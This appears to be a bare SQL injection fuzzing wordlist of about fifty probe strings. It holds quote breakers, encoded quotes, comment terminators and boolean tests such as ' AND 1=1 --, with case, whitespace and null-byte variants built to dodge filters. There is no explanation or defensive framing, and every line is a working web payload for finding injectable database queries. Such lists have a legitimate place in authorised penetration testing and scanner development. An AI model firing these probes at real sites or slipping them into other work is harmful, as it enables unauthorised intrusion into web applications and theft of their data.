'
\'
%2527
%df%27
'-- -
')-- -
'))-- -
' AND 1=1 --%0b
' And 1=2 --%0b
' ANd 1=1 %23
') AND 1=1 AND ('1
') AND 1=1 --%0b
')) AND 1=1 --%0b
')) AND 1=1 %23
') AND(1=1)-- 
')) AND 1=1 AND (('1
) ANd 1=1 (1=1
) AND(1=1) (1
) AND (1
)) AND 1=1 ((1
)) AND(1=1) ((1=1
\' ANd 1=1 %23
%2527 AND(1) %25271
%df%27 AND(1) %23
 ANd 1=1 --
'ANd 1=1 --
'ANd '1'='1'--
'ANd '1' LIKE '1'--
 ANd 1 LIKE 1 --
 And 1=1 
 anD 1=2 --
' ANd 1=1 %23
'ANd 1=2 --
' ANd 234=234--
' AND(1)AND'1
' AND(1=1)AND'1
'AND 1 LIKE 1 AND'1
'AND 1 LIKE 1 --%0b
'AND 1=DB_NAME() --
' %26%26(1) --%0b
' %26%26(1) %23
\' %26%26(1) %23
' AND 1=1 ;%00
' AND 1=1 %00
' AND 1=1 %16
' AND '1'='1 
' AND '1' LIKE '1
